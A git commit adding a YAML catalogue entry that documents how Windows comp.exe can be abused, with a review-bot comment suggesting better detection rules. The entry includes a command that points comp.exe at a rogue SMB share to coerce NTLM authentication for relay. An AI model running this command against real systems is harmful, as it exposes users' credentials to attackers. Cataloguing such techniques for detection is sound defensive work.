Update Comp.yml

Kousha Zanjani 2024-02-13 13:38:06 +03:30 committed by GitHub
parent a78e066441
commit d61d79b7c5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -1 +1,25 @@
---
Name: Comp.exe
Description: Used to compares the contents of two files or sets of files byte-by-byte
Author: 'Kousha Zanjani'
Created: 2024-02-13
Commands:
- Command: comp /M \\10.0.0.10\ fake.txt
Description: Tries to compare a file from rogue SMB Share with a fake.txt file
Usecase: Relay a NTLM authentication
Category: Credentials
Privileges: User
MitreID: T1187
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\comp.exe
- Path: C:\Windows\SysWOW64\comp.exe
Code_Sample:
- Code:
Detection:
- IOC: comp.exe retrieving files from remote server
Resources:
- Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/comp
Acknowledgement:
- Person: Kousha Zanjani
Handle:
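
Review bot: The Detection block carries a single IOC, "comp.exe retrieving files from remote server", which is too loose to build a rule from; tie it to what the Command line actually shows, for example comp.exe started with a UNC path (`\\host\...`) as an operand, and outbound SMB connections originating from C:\Windows\System32\comp.exe or C:\Windows\SysWOW64\comp.exe. In the same entry, `- Code:` under Code_Sample and `Handle:` under Acknowledgement are left empty, so either fill them or drop the keys. The Description has a grammar slip ("Used to compares") and "Windows vista" should be capitalized like the other OS names. The Usecase text says "Relay a NTLM authentication" while MitreID T1187 is Forced Authentication, so the wording would be clearer if it described coercing the authentication rather than the relay that may follow. Finally, the first operand in `comp /M \\10.0.0.10\ fake.txt` names no share or file even though the Description refers to a file on an SMB share; please make the two consistent.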